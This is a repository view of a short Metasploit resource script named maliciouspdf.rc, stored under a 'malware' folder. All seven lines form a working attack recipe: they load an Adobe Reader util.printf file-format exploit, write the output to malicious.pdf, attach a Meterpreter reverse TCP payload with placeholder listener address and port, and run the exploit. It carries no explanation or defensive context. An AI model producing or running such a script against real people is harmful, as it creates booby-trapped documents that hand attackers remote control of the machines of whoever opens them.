summaryrefslogtreecommitdiff
path: root/malware/maliciouspdf.rc
blob: eb8ca96eebbf65a7c4bcd2434ecabd6b4bd11f8a (plain)
1
2
3
4
5
6
7
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST listening_ip
set LPORT tcp_port
exploit
quit